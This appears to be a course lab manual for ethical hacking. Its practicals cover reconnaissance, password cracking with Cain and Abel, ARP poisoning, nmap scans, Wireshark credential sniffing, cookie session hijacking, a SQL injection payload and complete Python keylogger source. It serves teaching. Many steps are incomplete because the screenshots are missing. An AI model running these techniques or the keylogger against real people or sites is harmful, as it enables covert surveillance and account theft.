PRACTICAL NO.

AIM : Use Google and Whois for Reconnaisasance.

Using who.is

Step1: Open the WHO.is website

Step 2: Enter the website name and hit the “Enter button”.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 1|Page

 Step 3: Show you information about www.prestashop.com

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 2|Page

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 3|Page
Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 4|Page
Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 5|Page
Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 6|Page
 PRACTICAL NO. 2

2.1) Use CryptTool to encrypt and decrypt passwords using RC4 algorithm.
Step 1:

Step 2 : Using RC4.

Encryption using RC4

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 7|Page

 Decryption

2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords

Click on HASH Calcuator

Enter the password to convert into hash

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 8|Page

 Paste the value into the field you have converted

e.g(MD5)

Right Click on the hash and select the dictionary attack

Then right click on the file and select (Add to List) and then select the Wordlist

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 9|Page

 Select all the options and start the dictionary attack

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 10 | P a g e

 PRACTICAL NO. 3

3.1) Using TraceRoute, ping, ifconfig, netstat Command

Step 1: Type tracert command and type www.prestashop.com press “Enter”.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 11 | P a g e

 Step 2: Ping all the IP addresses

Ifconfig

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 12 | P a g e

 Netstat

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 13 | P a g e

 3.2) Perform ARP Poisoning in Windows

Step 2 : Select sniffer on the top.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 14 | P a g e

 Step 3 : Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.

Step 4 : Click on “+” icon on the top. Click on ok.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 15 | P a g e

 Step 5 : Shows the Connected host.

Step 6 : Select Arp at bottom.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 16 | P a g e

 Step 7 : Click on “+” icon at the top.

Step 8 : Click on start/stop ARP icon on top.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 17 | P a g e

 Step 9 : Poisoning the source.

Step 10 : Go to any website on source ip address.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 18 | P a g e

 Step 11 : Go to password option in the cain & abel and see the visited site password.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 19 | P a g e

 PRACTICAL NO. 4

AIM : Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.

NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it
is installed properly. Now type the below commands.

 ACK -sA (TCP ACK scan)

It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

 SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 20 | P a g e

  FIN Scan (-sF)
Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

 NULL Scan (-sN)

Does not set any bits (TCP flag header is 0)

Command: nmap –sN –p 22 scanme.nmap.org

 XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 21 | P a g e

 PRACTCAL NO. 5
5.1) Use WireShark sniffer to capture network traffic and analyze.

Step 1: Install and open WireShark .

Step 2: Go to Capture tab and select Interface option.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 22 | P a g e

 Step 3: In Capture interface, Select Local Area Connection and click on start.

Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 23 | P a g e

 Step 5: Open a website in a new window and enter the user id and password. Register if needed.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 24 | P a g e

 Step 6: Enter the credentials and then sign in.

Step 7: The wireshark tool will keep recording the packets.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 25 | P a g e

 Step 8: Select filter as http to make the search easier and click on apply.

Step 9: Now stop the tool to stop recording.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 26 | P a g e

 Step 10: Find the post methods for username and passwords.

Step 11: U will see the email- id and password that you used to log in.

DOS
Using NEMESIS

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 27 | P a g e

 PRACTICAL NO. 6
AIM: Simulate persistant Cross Site Scripting attack.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 28 | P a g e

 PRACTICAL NO. 7
AIM: Session impersonation using Firefox and Tamper Data add-on

A] Session Impersonation
STEPS
1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install EditThisCookie or Cookie Import/Export or any other Cookie tool
4. Then Click on Cookie extension to get cookie
5. Open a Website and Login and then click on export cookie

Logout from the webpage once the cookie got exported

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 29 | P a g e

 Paste the cookie in the tool which you have exported and click on green tick

And you are in

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 30 | P a g e

 Tamper DATA add-on

1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install Temper Data

Select a website for tempering data e.g(razorba)

Select any item to but

Then Click to add cart
Then Click on tool for tempering Data

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 31 | P a g e

 Then Start tempering the data

Here you go

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 32 | P a g e

 PRACTICAL NO. 8

AIM: Perform SQL injection attack.

Step 1 : Open XAMPP and start apache and mysql.

Step 2 : Go to web browser and enter site localhost/phpmyadmin.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 33 | P a g e

 Step 3 : Create database with name sql_db.

Step 4 : Go to site localhost/sql_injection/setup.php and click on create/reset database.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 34 | P a g e

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 35 | P a g e
 Step 5 : Go to login.php and login using admin and .

Step 6 : Opens the home page.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 36 | P a g e

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 37 | P a g e
 Step 7 : Go to security setting option in left and set security level low.

Step 8 : Click on SQL injection option in left.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 38 | P a g e

 Step 9 : Write "1" in text box and click on submit.

Step 10 : Write "a' or ''='" in text box and click on submit.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 39 | P a g e

 Step 11 : Write "1=1" in text box and click on submit.

Step 12 : Write "1*" in text box and click on submit.

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 40 | P a g e

 PRACTICAL NO. 9

Aim: - Create a simple keylogger using python

Code: -
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()
Output: -

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 41 | P a g e

 PRACTICAL NO. 10

AIM: Using Metasploit to exploit

Steps:
Download and open metasploit
Use exploit to attack the host
Create the exploit and add the exploit to the victim’s PC

Practical Manual: Ethical Hacking By Asst. Prof. Vijay Vastava 42 | P a g e